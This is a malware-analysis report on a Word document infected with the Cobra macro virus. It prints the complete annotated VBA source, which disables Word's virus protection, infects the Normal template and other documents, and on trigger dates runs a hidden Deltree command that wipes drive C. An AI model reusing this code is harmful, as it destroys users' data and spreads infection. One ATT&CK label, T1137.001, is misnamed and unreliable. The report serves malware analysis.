Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 922ee78feffbd2af…

MALICIOUS

Office (OLE)

Size: 40.0 KB
Created: 1999-10-14 15:14:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f1ea95c727a411ae325923ce21ee7069
SHA-1: 9c27e0d4e18c689ee7618fcea0f14f46ae84759a
SHA-256: 922ee78feffbd2afa994398e8bb95a9b1f1b17540276fef75bcb000b7443e3ae
Risk Score: 340

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1137.001 DLL Search Order Hijacking

The sample is a malicious Office document containing VBA macros. The AutoOpen macro attempts to disable virus protection and then executes several functions: DelMac, TempCopy, ADocCopy, and DelCDrive. DelMac and the copy functions appear to be designed to remove or copy macros, potentially to establish persistence or evade detection by modifying the Normal template and the active document. The ClamAV detection of 'Doc.Trojan.Cobra-7' and 'Win.Trojan.DelTree-10' further supports its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Trojan.Cobra-7 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Cobra-7
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 11054 bytes
  SHA-256: 47a962d661bcdac8bf96f1cbdabb634419dbe5ad8bd95535f9a597b422423b3a
  Detection: ClamAV: Win.Trojan.DelTree-10
  Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Cobra"
'Cobra Version 1.0C
Sub AutoOpen()
    ' Runs on document open: switch off Word's macro virus warning and save prompts,
    ' then chain the infection and payload routines
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Call DelMac
    Call TempCopy
    Call ADocCopy
    Call DelCDrive
End Sub
Sub DelMac()
    ' Remove every macro module other than Cobra/ThisDocument from the Normal
    ' template and from the active document (clears out competing macros)
    On Error Resume Next
    Set NTmp = NormalTemplate
    Set ADoc = ActiveDocument
    For i = 1 To NTmp.VBProject.VBComponents.Count
        NM = NTmp.VBProject.VBComponents(i).Name
        If (NM <> "Cobra") And (NM <> "ThisDocument") Then
            Application.OrganizerDelete Source:=NTmp.FullName, _
                Name:=NM, Object:=wdOrganizerObjectProjectItems
        End If
    Next i
    For i = 1 To ADoc.VBProject.VBComponents.Count
        NM = ADoc.VBProject.VBComponents(i).Name
        If (NM <> "ThisDocument") And (NM <> "Cobra") And _
           (NM <> "Reference to Normal") Then
            Application.OrganizerDelete Source:=ADoc.FullName, _
                Name:=NM, Object:=wdOrganizerObjectProjectItems
        End If
    Next i
End Sub
Private Sub TempCopy()
    ' Copy the Cobra module into the Normal template and save it (persistence)
    On Error Resume Next
    Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="Cobra", _
        Object:=wdOrganizerObjectProjectItems
    Templates(NormalTemplate.FullName).Save
End Sub
Private Sub ADocCopy()
    ' Copy the Cobra module from the Normal template into the active document (propagation)
    On Error Resume Next
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
        Destination:=ActiveDocument.FullName, Name:="Cobra", _
        Object:=wdOrganizerObjectProjectItems
End Sub
Private Sub DelCDrive()
    ' Trigger check: fires only when the day and month are equal (1/1, 2/2, ... 12/12)
    ' and the first character of the Word user name falls in a band tied to that month
    On Error Resume Next
    Dim DelOk As Boolean
    For i = 1 To 12
        If Day(Now) = i And Month(Now) = i Then
            If i <= 4 Then
                If Left(Application.UserName, 1) <= Chr(100) Then
                    DelOk = True
                End If
            End If
            If i > 4 And i <= 8 Then
                If Left(Application.UserName, 1) > Chr(100) _
                   And Left(Application.UserName, 1) <= Chr(200) Then
                    DelOk = True
                End If
            End If
            If i > 8 And i <= 12 Then
                If Left(Application.UserName, 1) > Chr(200) _
                   And Left(Application.UserName, 1) <= Chr(255) Then
                    DelOk = True
                End If
            End If
        End If
    Next
    If DelOk = True Then
        Call DelDir
    End If
End Sub
Sub AutoClose()
    ' Runs on document close: re-infect both sides and force a save
    On Error Resume Next
    TempCopy
    ADocCopy
    If ActiveDocument.Saved = False Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    End If
End Sub
Sub DelDir()
    ' Destructive payload: if any top-level directory on C:\ starts with the same
    ' letter as the user name, wipe the drive with a hidden Deltree call
    On Error Resume Next
    Dim MP, MN
    MP = "c:\"
    MN = Dir(MP, vbDirectory)
    Do While MN <> ""
        If MN <> "." And MN <> ".." Then
            If (GetAttr(MP & MN) And vbDirectory) = vbDirectory Then
                If UCase(Left(MN, 1)) = UCase(Left(Application.UserName, 1)) Then
                    Shell "Deltree /y c:\*.*", vbHide
                End If
            End If
        End If
        MN = Dir
    Loop
End Sub
Sub FileNew()
    ' Hooks File > New: clean competing macros, re-infect, then show the real dialog
    On Error Resume Next
    Call DelMac
    Call TempCopy
    Call ADocCopy
    Dialogs(wdDialogFileNew).Show
End Sub
Sub FileExit()
    ' Hooks File > Exit: clean competing macros and re-infect before Word quits
    On Error Resume Next
    Call DelMac
    Call TempCopy
    Call ADocCopy
End Sub

' Processing file: /opt/analyzer/scan_staging/4cae7df50dda41a69dab4e2e3facd3d1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Cobra - 5403 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0012 "Cobra Version 1.0C"
' Line #1:
' 	FuncDefn (Sub AutoOpen())
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #5:
' 	ArgsCall (Call) DelMac 0x0000 
' Line #6:
' 	ArgsCall (Call) Temp
... (truncated)